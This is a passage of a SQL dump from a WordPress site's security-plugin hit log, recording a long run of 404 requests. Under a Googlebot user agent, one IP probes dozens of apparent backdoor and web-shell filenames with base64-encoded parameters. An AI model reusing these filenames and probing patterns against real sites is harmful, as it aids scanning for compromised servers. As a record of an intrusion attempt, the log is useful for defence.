(71986, 1494369287.925068, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/xxx.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71987, 1494369307.956018, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/xxx.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71988, 1494369316.133595, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/al277.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71989, 1494369330.710229, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/al277.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(71990, 1494369342.425650, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/cache/cache_aqbmkwwx.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71991, 1494369343.758346, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/cache/cache_aqbmkwwx.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71992, 1494369363.264314, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/install.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71993, 1494369372.070773, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/install.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71994, 1494369378.309615, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/dswat.org/wsdl.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2Rzd2F0Lm9yZy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71995, 1494369395.245187, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/dswat.org/wsdl.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2Rzd2F0Lm9yZy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71996, 1494369410.003322, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/robot.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71997, 1494369417.084549, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/robot.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71998, 1494369418.341021, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wsdl.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71999, 1494369434.028604, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wsdl.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72000, 1494369455.872849, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/goog1es.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72001, 1494369463.433763, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/goog1es.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72002, 1494369481.967817, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/site/tmp/cTivrC.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3NpdGUvdG1wLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72003, 1494369499.012009, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/site/tmp/cTivrC.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3NpdGUvdG1wLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72004, 1494369518.842346, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/update.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72005, 1494369525.415989, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/update.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72006, 1494369543.608378, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/includes.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72007, 1494369562.229248, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/includes.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72008, 1494369577.782056, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-main.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72009, 1494369587.965916, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-main.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72010, 1494369601.291918, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/news.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72011, 1494369613.569382, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/news.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72012, 1494369632.693055, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/al277.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72013, 1494369633.823184, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/al277.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72014, 1494369647.374168, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/webconfig.txt.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72015, 1494369654.217380, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/webconfig.txt.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72016, 1494369663.074945, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/administrator/webconfig.txt.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2FkbWluaXN0cmF0b3Iv', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72017, 1494369675.659715, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/administrator/webconfig.txt.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2FkbWluaXN0cmF0b3Iv', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72018, 1494369677.022873, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/cache/cachee.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72019, 1494369695.232080, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/cache/cachee.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72020, 1494369703.809965, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/thumb.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72021, 1494369707.895918, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/thumb.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72022, 1494369714.188335, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/administrator/dbconfig.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2FkbWluaXN0cmF0b3Iv', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72023, 1494369732.438368, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/administrator/dbconfig.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2FkbWluaXN0cmF0b3Iv', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72024, 1494369741.666723, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/administrator/administrator.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2FkbWluaXN0cmF0b3Iv', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72025, 1494369758.424298, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/administrator/administrator.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2FkbWluaXN0cmF0b3Iv', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72026, 1494369770.213554, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/SessionController.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72027, 1494369785.872447, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/SessionController.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72028, 1494369796.853446, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/maill.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72029, 1494369808.133916, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/maill.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72030, 1494369817.048106, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/webconfig.txt.php.suspected?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72031, 1494369823.657430, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/webconfig.txt.php.suspected?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72032, 1494369838.718131, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/error-log.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72033, 1494369839.751055, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/error-log.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72034, 1494369843.519574, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/authenticating.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72035, 1494369854.314188, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/authenticating.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72036, 1494369866.928244, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/google-assist.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72037, 1494369873.554918, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/google-assist.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72038, 1494369878.627159, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/google-assist.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72039, 1494369883.838139, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/google-assist.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72040, 1494369898.112007, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/robots.txt.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72041, 1494369908.009260, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/robots.txt.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72042, 1494369920.422891, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/elements.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72043, 1494369943.156534, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/elements.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72044, 1494369965.396582, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/xmlsrpc.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72045, 1494369984.914027, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/xmlsrpc.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72046, 1494370007.285210, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-cache.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72047, 1494370031.140597, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-cache.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72048, 1494370048.536247, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/404.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72049, 1494370058.949625, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/404.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72050, 1494370076.946604, 676177839, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72051, 1494370078.023606, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/head.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72052, 1494370085.375182, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/head.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72053, 1494370097.422983, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/cache/support.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72054, 1494370108.919577, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/cache/support.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72055, 1494370128.184399, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/RoseLeif.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72056, 1494370138.800875, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/RoseLeif.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72057, 1494370159.839039, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/Abbrevsprl.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72058, 1494370170.079948, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/Abbrevsprl.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72059, 1494370189.885523, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/show.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72060, 1494370200.439452, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/show.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72061, 1494370222.261985, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/defau1t.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72062, 1494370230.392806, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/defau1t.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72063, 1494370235.496929, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/cli/40dd1d.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NsaS8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72064, 1494370253.878582, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/cli/40dd1d.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NsaS8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72065, 1494370268.974093, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/administrator/includes/readmy.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2FkbWluaXN0cmF0b3IvaW5jbHVkZXMv', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72066, 1494370274.418486, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/administrator/includes/readmy.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2FkbWluaXN0cmF0b3IvaW5jbHVkZXMv', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72067, 1494370291.218542, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/infos.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72068, 1494370312.844030, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/infos.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72069, 1494370318.858845, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/cache/defau1t.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72070, 1494370320.908022, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/cache/defau1t.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72071, 1494370335.824822, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/bookmark.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72072, 1494370354.982522, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/bookmark.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72073, 1494370370.471390, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/configbak.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72074, 1494370396.441663, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/configbak.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72075, 1494370401.560986, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-data.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72076, 1494370416.337767, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-data.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72077, 1494370420.789714, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/Fbrrchive.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72078, 1494370436.082088, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/Fbrrchive.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
